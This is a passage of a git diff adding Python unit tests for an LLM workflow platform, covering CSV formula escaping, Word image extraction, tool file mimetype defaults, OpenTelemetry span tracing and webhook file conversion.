multiline_with_formula = "=SUM(A1)\nLine 2" + assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}" + + def test_whitespace_only_strings(self): + """Test handling of whitespace-only strings.""" + assert CSVSanitizer.sanitize_value(" ") == " " + assert CSVSanitizer.sanitize_value("\n\n") == "\n\n" + # Tab at start should be escaped + assert CSVSanitizer.sanitize_value("\t ") == "'\t " diff --git a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py index 3635e4dbf9..fd0b0e2e44 100644 --- a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py +++ b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py @@ -1,7 +1,10 @@ """Primarily used for testing merged cell scenarios""" +from types import SimpleNamespace + from docx import Document +import core.rag.extractor.word_extractor as we from core.rag.extractor.word_extractor import WordExtractor @@ -47,3 +50,85 @@ def test_parse_row(): extractor = object.__new__(WordExtractor) for idx, row in enumerate(table.rows): assert extractor._parse_row(row, {}, 3) == gt[idx] + + +def test_extract_images_from_docx(monkeypatch): + external_bytes = b"ext-bytes" + internal_bytes = b"int-bytes" + + # Patch storage.save to capture writes + saves: list[tuple[str, bytes]] = [] + + def save(key: str, data: bytes): + saves.append((key, data)) + + monkeypatch.setattr(we, "storage", SimpleNamespace(save=save)) + + # Patch db.session to record adds/commit + class DummySession: + def __init__(self): + self.added = [] + self.committed = False + + def add(self, obj): + self.added.append(obj) + + def commit(self): + self.committed = True + + db_stub = SimpleNamespace(session=DummySession()) + monkeypatch.setattr(we, "db", db_stub) + + # Patch config values used for URL composition and storage type + monkeypatch.setattr(we.dify_config, "FILES_URL", "http://files.local", raising=False) + monkeypatch.setattr(we.dify_config, "STORAGE_TYPE", "local", raising=False) + + # Patch UploadFile to avoid real DB models + class FakeUploadFile: + _i = 0 + + def __init__(self, **kwargs): # kwargs match the real signature fields + type(self)._i += 1 + self.id = f"u{self._i}" + + monkeypatch.setattr(we, "UploadFile", FakeUploadFile) + + # Patch external image fetcher + def fake_get(url: str): + assert url == "https://example.com/image.png" + return SimpleNamespace(status_code=200, headers={"Content-Type": "image/png"}, content=external_bytes) + + monkeypatch.setattr(we, "ssrf_proxy", SimpleNamespace(get=fake_get)) + + # A hashable internal part object with a blob attribute + class HashablePart: + def __init__(self, blob: bytes): + self.blob = blob + + def __hash__(self) -> int: # ensure it can be used as a dict key like real docx parts + return id(self) + + # Build a minimal doc object with both external and internal image rels + internal_part = HashablePart(blob=internal_bytes) + rel_ext = SimpleNamespace(is_external=True, target_ref="https://example.com/image.png") + rel_int = SimpleNamespace(is_external=False, target_ref="word/media/image1.png", target_part=internal_part) + doc = SimpleNamespace(part=SimpleNamespace(rels={"rId1": rel_ext, "rId2": rel_int})) + + extractor = object.__new__(WordExtractor) + extractor.tenant_id = "t1" + extractor.user_id = "u1" + + image_map = extractor._extract_images_from_docx(doc) + + # Returned map should contain entries for external (keyed by rId) and internal (keyed by target_part) + assert set(image_map.keys()) == {"rId1", 
internal_part} + assert all(v.startswith("![image](") and v.endswith("/file-preview)") for v in image_map.values()) + + # Storage should receive both payloads + payloads = {data for _, data in saves} + assert external_bytes in payloads + assert internal_bytes in payloads + + # DB interactions should be recorded + assert len(db_stub.session.added) == 2 + assert db_stub.session.committed is True diff --git a/api/tests/unit_tests/core/tools/utils/test_message_transformer.py b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py new file mode 100644 index 0000000000..af3cdddd5f --- /dev/null +++ b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py @@ -0,0 +1,86 @@ +import pytest + +import core.tools.utils.message_transformer as mt +from core.tools.entities.tool_entities import ToolInvokeMessage + + +class _FakeToolFile: + def __init__(self, mimetype: str): + self.id = "fake-tool-file-id" + self.mimetype = mimetype + + +class _FakeToolFileManager: + """Fake ToolFileManager to capture the mimetype passed in.""" + + last_call: dict | None = None + + def __init__(self, *args, **kwargs): + pass + + def create_file_by_raw( + self, + *, + user_id: str, + tenant_id: str, + conversation_id: str | None, + file_binary: bytes, + mimetype: str, + filename: str | None = None, + ): + type(self).last_call = { + "user_id": user_id, + "tenant_id": tenant_id, + "conversation_id": conversation_id, + "file_binary": file_binary, + "mimetype": mimetype, + "filename": filename, + } + return _FakeToolFile(mimetype) + + +@pytest.fixture(autouse=True) +def _patch_tool_file_manager(monkeypatch): + # Patch the manager used inside the transformer module + monkeypatch.setattr(mt, "ToolFileManager", _FakeToolFileManager) + # also ensure predictable URL generation (no need to patch; uses id and extension only) + yield + _FakeToolFileManager.last_call = None + + +def _gen(messages): + yield from messages + + +def test_transform_tool_invoke_messages_mimetype_key_present_but_none(): + # Arrange: a BLOB message whose meta contains a mime_type key set to None + blob = b"hello" + msg = ToolInvokeMessage( + type=ToolInvokeMessage.MessageType.BLOB, + message=ToolInvokeMessage.BlobMessage(blob=blob), + meta={"mime_type": None, "filename": "greeting"}, + ) + + # Act + out = list( + mt.ToolFileMessageTransformer.transform_tool_invoke_messages( + messages=_gen([msg]), + user_id="u1", + tenant_id="t1", + conversation_id="c1", + ) + ) + + # Assert: default to application/octet-stream when mime_type is present but None + assert _FakeToolFileManager.last_call is not None + assert _FakeToolFileManager.last_call["mimetype"] == "application/octet-stream" + + # Should yield a BINARY_LINK (not IMAGE_LINK) and the URL ends with .bin + assert len(out) == 1 + o = out[0] + assert o.type == ToolInvokeMessage.MessageType.BINARY_LINK + assert isinstance(o.message, ToolInvokeMessage.TextMessage) + assert o.message.text.endswith(".bin") + # meta is preserved (still contains mime_type: None) + assert "mime_type" in (o.meta or {}) + assert o.meta["mime_type"] is None diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py new file mode 100644 index 0000000000..b18a3369e9 --- /dev/null +++ 
b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py @@ -0,0 +1,101 @@ +""" +Shared fixtures for ObservabilityLayer tests. +""" + +from unittest.mock import MagicMock, patch + +import pytest +from opentelemetry.sdk.trace import TracerProvider +from opentelemetry.sdk.trace.export import SimpleSpanProcessor +from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter +from opentelemetry.trace import set_tracer_provider + +from core.workflow.enums import NodeType + + +@pytest.fixture +def memory_span_exporter(): + """Provide an in-memory span exporter for testing.""" + return InMemorySpanExporter() + + +@pytest.fixture +def tracer_provider_with_memory_exporter(memory_span_exporter): + """Provide a TracerProvider configured with memory exporter.""" + import opentelemetry.trace as trace_api + + trace_api._TRACER_PROVIDER = None + trace_api._TRACER_PROVIDER_SET_ONCE._done = False + + provider = TracerProvider() + processor = SimpleSpanProcessor(memory_span_exporter) + provider.add_span_processor(processor) + set_tracer_provider(provider) + + yield provider + + provider.force_flush() + + +@pytest.fixture +def mock_start_node(): + """Create a mock Start Node.""" + node = MagicMock() + node.id = "test-start-node-id" + node.title = "Start Node" + node.execution_id = "test-start-execution-id" + node.node_type = NodeType.START + return node + + +@pytest.fixture +def mock_llm_node(): + """Create a mock LLM Node.""" + node = MagicMock() + node.id = "test-llm-node-id" + node.title = "LLM Node" + node.execution_id = "test-llm-execution-id" + node.node_type = NodeType.LLM + return node + + +@pytest.fixture +def mock_tool_node(): + """Create a mock Tool Node with tool-specific attributes.""" + from core.tools.entities.tool_entities import ToolProviderType + from core.workflow.nodes.tool.entities import ToolNodeData + + node = MagicMock() + node.id = "test-tool-node-id" + node.title = "Test Tool Node" + node.execution_id = "test-tool-execution-id" + node.node_type = NodeType.TOOL + + tool_data = ToolNodeData( + title="Test Tool Node", + desc=None, + provider_id="test-provider-id", + provider_type=ToolProviderType.BUILT_IN, + provider_name="test-provider", + tool_name="test-tool", + tool_label="Test Tool", + tool_configurations={}, + tool_parameters={}, + ) + node._node_data = tool_data + + return node + + +@pytest.fixture +def mock_is_instrument_flag_enabled_false(): + """Mock is_instrument_flag_enabled to return False.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False): + yield + + +@pytest.fixture +def mock_is_instrument_flag_enabled_true(): + """Mock is_instrument_flag_enabled to return True.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True): + yield diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py new file mode 100644 index 0000000000..458cf2cc67 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py @@ -0,0 +1,219 @@ +""" +Tests for ObservabilityLayer. 
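+
+All tests capture spans through an InMemorySpanExporter attached to a
+fresh TracerProvider (see the fixtures in conftest.py).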
+ +Test coverage: +- Initialization and enable/disable logic +- Node span lifecycle (start, end, error handling) +- Parser integration (default and tool-specific) +- Graph lifecycle management +- Disabled mode behavior +""" + +from unittest.mock import patch + +import pytest +from opentelemetry.trace import StatusCode + +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.observability import ObservabilityLayer + + +class TestObservabilityLayerInitialization: + """Test ObservabilityLayer initialization logic.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer initializes correctly when OTel is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true") + def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer enables when instrument flag is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + +class TestObservabilityLayerNodeSpanLifecycle: + """Test node span creation and lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_span_created_and_ended( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that span is created on node start and ended on node end.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].name == mock_llm_node.title + assert spans[0].status.status_code == StatusCode.OK + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_error_recorded_in_span( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that node execution errors are recorded in span.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + error = ValueError("Test error") + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, error) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].status.status_code == StatusCode.ERROR + assert len(spans[0].events) > 0 + assert any("exception" in event.name.lower() for event in spans[0].events) + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_end_without_start_handled_gracefully( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that ending a node without start doesn't crash.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + 
layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + +class TestObservabilityLayerParserIntegration: + """Test parser integration for different node types.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_default_parser_used_for_regular_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node + ): + """Test that default parser is used for non-tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_start_node.id + assert attrs["node.execution_id"] == mock_start_node.execution_id + assert attrs["node.type"] == mock_start_node.node_type.value + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_tool_parser_used_for_tool_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node + ): + """Test that tool parser is used for tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_tool_node) + layer.on_node_run_end(mock_tool_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_tool_node.id + assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id + assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value + assert attrs["tool.name"] == mock_tool_node._node_data.tool_name + + +class TestObservabilityLayerGraphLifecycle: + """Test graph lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node): + """Test that on_graph_start clears node contexts.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_start() + assert len(layer._node_contexts) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_no_unfinished_spans( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that on_graph_end handles normal completion.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + layer.on_graph_end(None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_unfinished_spans_logs_warning( + self, tracer_provider_with_memory_exporter, mock_llm_node, caplog + ): + """Test that on_graph_end logs warning for unfinished spans.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + 
layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_end(None) + + assert len(layer._node_contexts) == 0 + assert "node spans were not properly ended" in caplog.text + + +class TestObservabilityLayerDisabledMode: + """Test behavior when layer is disabled.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node): + """Test that disabled layer doesn't create spans on node start.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_graph_start() + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node): + """Test that disabled layer doesn't process node end.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py new file mode 100644 index 0000000000..ead2334473 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py @@ -0,0 +1,452 @@ +""" +Unit tests for webhook file conversion fix. + +This test verifies that webhook trigger nodes properly convert file dictionaries +to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error +when passing files to downstream LLM nodes. 
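+
+As exercised in the tests below, the intended conversion chain is:
+raw file dict -> file_factory.build_from_mapping -> build_segment_with_type
+-> FileVariable (with selector [node_id, parameter_name]).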
+""" + +from unittest.mock import Mock, patch + +from core.app.entities.app_invoke_entities import InvokeFrom +from core.workflow.entities.graph_init_params import GraphInitParams +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus +from core.workflow.nodes.trigger_webhook.entities import ( + ContentType, + Method, + WebhookBodyParameter, + WebhookData, +) +from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode +from core.workflow.runtime.graph_runtime_state import GraphRuntimeState +from core.workflow.runtime.variable_pool import VariablePool +from core.workflow.system_variable import SystemVariable +from models.enums import UserFrom +from models.workflow import WorkflowType + + +def create_webhook_node( + webhook_data: WebhookData, + variable_pool: VariablePool, + tenant_id: str = "test-tenant", +) -> TriggerWebhookNode: + """Helper function to create a webhook node with proper initialization.""" + node_config = { + "id": "webhook-node-1", + "data": webhook_data.model_dump(), + } + + graph_init_params = GraphInitParams( + tenant_id=tenant_id, + app_id="test-app", + workflow_type=WorkflowType.WORKFLOW, + workflow_id="test-workflow", + graph_config={}, + user_id="test-user", + user_from=UserFrom.ACCOUNT, + invoke_from=InvokeFrom.SERVICE_API, + call_depth=0, + ) + + runtime_state = GraphRuntimeState( + variable_pool=variable_pool, + start_at=0, + ) + + node = TriggerWebhookNode( + id="webhook-node-1", + config=node_config, + graph_init_params=graph_init_params, + graph_runtime_state=runtime_state, + ) + + # Attach a lightweight app_config onto runtime state for tenant lookups + runtime_state.app_config = Mock() + runtime_state.app_config.tenant_id = tenant_id + + # Provide compatibility alias expected by node implementation + # Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests + node.node_id = node.id + + return node + + +def create_test_file_dict( + filename: str = "test.jpg", + file_type: str = "image", + transfer_method: str = "local_file", +) -> dict: + """Create a test file dictionary as it would come from webhook service.""" + return { + "id": "file-123", + "tenant_id": "test-tenant", + "type": file_type, + "filename": filename, + "extension": ".jpg", + "mime_type": "image/jpeg", + "transfer_method": transfer_method, + "related_id": "related-123", + "storage_key": "storage-key-123", + "size": 1024, + "url": "https://example.com/test.jpg", + "created_at": 1234567890, + "used_at": None, + "hash": "file-hash-123", + } + + +def test_webhook_node_file_conversion_to_file_variable(): + """Test that webhook node converts file dictionaries to FileVariable objects.""" + # Create test file dictionary (as it comes from webhook service) + file_dict = create_test_file_dict("uploaded_image.jpg") + + data = WebhookData( + title="Test Webhook with File", + method=Method.POST, + content_type=ContentType.FORM_DATA, + body=[ + WebhookBodyParameter(name="image_upload", type="file", required=True), + WebhookBodyParameter(name="message", type="string", required=False), + ], + ) + + variable_pool = VariablePool( + system_variables=SystemVariable.empty(), + user_inputs={ + "webhook_data": { + "headers": {}, + "query_params": {}, + "body": {"message": "Test message"}, + "files": { + "image_upload": file_dict, + }, + } + }, + ) + + node = create_webhook_node(data, variable_pool) + + # Mock the file factory and variable factory + with ( + patch("factories.file_factory.build_from_mapping") as mock_file_factory, + 
+        patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
+        patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
+    ):
+        # Setup mocks
+        mock_file_obj = Mock()
+        mock_file_obj.to_dict.return_value = file_dict
+        mock_file_factory.return_value = mock_file_obj
+
+        mock_segment = Mock()
+        mock_segment.value = mock_file_obj
+        mock_segment_factory.return_value = mock_segment
+
+        mock_file_var_instance = Mock()
+        mock_file_variable.return_value = mock_file_var_instance
+
+        # Run the node
+        result = node._run()
+
+        # Verify successful execution
+        assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
+
+        # Verify the file factory was called with the correct parameters
+        mock_file_factory.assert_called_once_with(
+            mapping=file_dict,
+            tenant_id="test-tenant",
+        )
+
+        # Verify the segment factory was called to create a FileSegment
+        mock_segment_factory.assert_called_once()
+
+        # Verify FileVariable was created with the correct parameters
+        mock_file_variable.assert_called_once()
+        call_args = mock_file_variable.call_args[1]
+        assert call_args["name"] == "image_upload"
+        # value should be the built segment's .value
+        assert call_args["value"] == mock_segment.value
+        assert call_args["selector"] == ["webhook-node-1", "image_upload"]
+
+        # Verify the output contains the FileVariable, not the original dict
+        assert result.outputs["image_upload"] == mock_file_var_instance
+        assert result.outputs["message"] == "Test message"
+
+
+def test_webhook_node_file_conversion_with_missing_files():
+    """Test webhook node file conversion with a missing file parameter."""
+    data = WebhookData(
+        title="Test Webhook with Missing File",
+        method=Method.POST,
+        content_type=ContentType.FORM_DATA,
+        body=[
+            WebhookBodyParameter(name="missing_file", type="file", required=False),
+        ],
+    )
+
+    variable_pool = VariablePool(
+        system_variables=SystemVariable.empty(),
+        user_inputs={
+            "webhook_data": {
+                "headers": {},
+                "query_params": {},
+                "body": {},
+                "files": {},  # No files
+            }
+        },
+    )
+
+    node = create_webhook_node(data, variable_pool)
+
+    # Run the node without patches (should handle the missing-file case gracefully)
+    result = node._run()
+
+    # Verify successful execution
+    assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
+
+    # Verify no file entries were recorded in the raw webhook payload
+    assert result.outputs["_webhook_raw"]["files"] == {}
+
+
+def test_webhook_node_file_conversion_with_none_file():
+    """Test webhook node file conversion with a None file value."""
+    data = WebhookData(
+        title="Test Webhook with None File",
+        method=Method.POST,
+        content_type=ContentType.FORM_DATA,
+        body=[
+            WebhookBodyParameter(name="none_file", type="file", required=False),
+        ],
+    )
+
+    variable_pool = VariablePool(
+        system_variables=SystemVariable.empty(),
+        user_inputs={
+            "webhook_data": {
+                "headers": {},
+                "query_params": {},
+                "body": {},
+                "files": {
+                    "file": None,
+                },
+            }
+        },
+    )
+
+    node = create_webhook_node(data, variable_pool)
+
+    # Run the node without patches (should handle the None case gracefully)
+    result = node._run()
+
+    # Verify successful execution
+    assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
+
+    # Verify the None file value is passed through as None
+    assert result.outputs["_webhook_raw"]["files"]["file"] is None
+
+
+def test_webhook_node_file_conversion_with_non_dict_file():
+    """Test webhook node file conversion with a non-dict file value."""
+    data = WebhookData(
+        title="Test Webhook with Non-Dict File",
+        method=Method.POST,
+        content_type=ContentType.FORM_DATA,
+        body=[
+            WebhookBodyParameter(name="wrong_type", type="file", required=True),
+        ],
+    )
+
+    variable_pool = VariablePool(
+        system_variables=SystemVariable.empty(),
+        user_inputs={
+            "webhook_data": {
+                "headers": {},
+                "query_params": {},
+                "body": {},
+                "files": {
+                    "file": "not_a_dict",  # Wrapped to match the node's expectation
+                },
+            }
+        },
+    )
+
+    node = create_webhook_node(data, variable_pool)
+
+    # Run the node without patches (should handle the non-dict case gracefully)
+    result = node._run()
+
+    # Verify successful execution
+    assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
+
+    # Verify fallback to the original (wrapped) value
+    assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict"
+
+
+def test_webhook_node_file_conversion_mixed_parameters():
+    """Test webhook node with mixed parameter types including files."""
+    file_dict = create_test_file_dict("mixed_test.jpg")
+
+    data = WebhookData(
+        title="Test Webhook Mixed Parameters",
+        method=Method.POST,
+        content_type=ContentType.FORM_DATA,
+        headers=[],
+        params=[],
+        body=[
+            WebhookBodyParameter(name="text_param", type="string", required=True),
+            WebhookBodyParameter(name="number_param", type="number", required=False),
+            WebhookBodyParameter(name="file_param", type="file", required=True),
+            WebhookBodyParameter(name="bool_param", type="boolean", required=False),
+        ],
+    )
+
+    variable_pool = VariablePool(
+        system_variables=SystemVariable.empty(),
+        user_inputs={
+            "webhook_data": {
+                "headers": {},
+                "query_params": {},
+                "body": {
+                    "text_param": "Hello World",
+                    "number_param": 42,
+                    "bool_param": True,
+                },
+                "files": {
+                    "file_param": file_dict,
+                },
+            }
+        },
+    )
+
+    node = create_webhook_node(data, variable_pool)
+
+    with (
+        patch("factories.file_factory.build_from_mapping") as mock_file_factory,
+        patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
+        patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
+    ):
+        # Setup mocks for the file
+        mock_file_obj = Mock()
+        mock_file_factory.return_value = mock_file_obj
+
+        mock_segment = Mock()
+        mock_segment.value = mock_file_obj
+        mock_segment_factory.return_value = mock_segment
+
+        mock_file_var = Mock()
+        mock_file_variable.return_value = mock_file_var
+
+        # Run the node
+        result = node._run()
+
+        # Verify successful execution
+        assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
+
+        # Verify all parameters are present
+        assert result.outputs["text_param"] == "Hello World"
+        assert result.outputs["number_param"] == 42
+        assert result.outputs["bool_param"] is True
+        assert result.outputs["file_param"] == mock_file_var
+
+        # Verify the file conversion was invoked
+        mock_file_factory.assert_called_once_with(
+            mapping=file_dict,
+            tenant_id="test-tenant",
+        )
+
+
+def test_webhook_node_different_file_types():
+    """Test webhook node file conversion with different file types."""
+    image_dict = create_test_file_dict("image.jpg", "image")
+
+    data = WebhookData(
+        title="Test Webhook Different File Types",
+        method=Method.POST,
+        content_type=ContentType.FORM_DATA,
+        body=[
+            WebhookBodyParameter(name="image", type="file", required=True),
+            WebhookBodyParameter(name="document", type="file", required=True),
+            WebhookBodyParameter(name="video", type="file", required=True),
+        ],
+    )
+
+    variable_pool = VariablePool(
+        system_variables=SystemVariable.empty(),
+        user_inputs={
+            "webhook_data": {
+                "headers": {},
+                "query_params": {},
+                "body": {},
+                "files": {
+                    "image": image_dict,
+                    "document": create_test_file_dict("document.pdf", "document"),
+                    "video": create_test_file_dict("video.mp4", "video"),
+                },
+            }
+        },
+    )
+
+    node = create_webhook_node(data, variable_pool)
+
+    with (
+        patch("factories.file_factory.build_from_mapping") as mock_file_factory,
+        patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
+        patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
+    ):
+        # Setup mocks for all files
+        mock_file_objs = [Mock() for _ in range(3)]
+        mock_segments = [Mock() for _ in range(3)]
+        mock_file_vars = [Mock() for _ in range(3)]
+
+        # Map each segment.value to its corresponding mock file obj
+        for seg, f in zip(mock_segments, mock_file_objs):
+            seg.value = f
+
+        mock_file_factory.side_effect = mock_file_objs
+        mock_segment_factory.side_effect = mock_segments
+        mock_file_variable.side_effect = mock_file_vars
+
+        # Run the node
+        result = node._run()
+
+        # Verify successful execution
+        assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
+
+        # Verify all file types were converted
+        assert mock_file_factory.call_count == 3
+        assert result.outputs["image"] == mock_file_vars[0]
+        assert result.outputs["document"] == mock_file_vars[1]
+        assert result.outputs["video"] == mock_file_vars[2]
+
+
+def test_webhook_node_file_conversion_with_non_dict_wrapper():
+    """Test webhook node file conversion when the file wrapper is not a dict."""
+    data = WebhookData(
+        title="Test Webhook with Non-dict File Wrapper",
+        method=Method.POST,
+        content_type=ContentType.FORM_DATA,
+        body=[
+            WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True),
+        ],
+    )
+
+    variable_pool = VariablePool(
+        system_variables=SystemVariable.empty(),
+        user_inputs={
+            "webhook_data": {
+                "headers": {},
+                "query_params": {},
+                "body": {},
+                "files": {
+                    "file": "just a string",
+                },
+            }
+        },
+    )
+
+    node = create_webhook_node(data, variable_pool)
+    result = node._run()
+
+    # Verify successful execution (should not crash)
+    assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
+    # Verify fallback to the original value
+    assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string"
diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py
index a599d4f831..bbb5511923 100644
--- a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py
+++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_node.py
@@ -1,8 +1,10 @@
+from unittest.mock import patch
+
 import pytest
 
 from core.app.entities.app_invoke_entities import InvokeFrom
 from core.file import File, FileTransferMethod, FileType
-from core.variables import StringVariable
+from core.variables import FileVariable, StringVariable
 from core.workflow.entities.graph_init_params import GraphInitParams
 from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
 from core.workflow.nodes.trigger_webhook.entities import (
@@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool)
         "data": webhook_data.model_dump(),
     }
 
+    graph_init_params = GraphInitParams(
+        tenant_id="1",
+        app_id="1",
+        workflow_type=WorkflowType.WORKFLOW,
+        workflow_id="1",
+        graph_config={},
+        user_id="1",
+        user_from=UserFrom.ACCOUNT,
+        invoke_from=InvokeFrom.SERVICE_API,
+        call_depth=0,
+    )
+    runtime_state = GraphRuntimeState(
+        variable_pool=variable_pool,
+        start_at=0,
+    )
     node = TriggerWebhookNode(
         id="1",
         config=node_config,
-        graph_init_params=GraphInitParams(
-            tenant_id="1",
-            app_id="1",
-            workflow_type=WorkflowType.WORKFLOW,
-            workflow_id="1",
-            graph_config={},
-            user_id="1",
-            user_from=UserFrom.ACCOUNT,
-            invoke_from=InvokeFrom.SERVICE_API,
-            call_depth=0,
-        ),
-        graph_runtime_state=GraphRuntimeState(
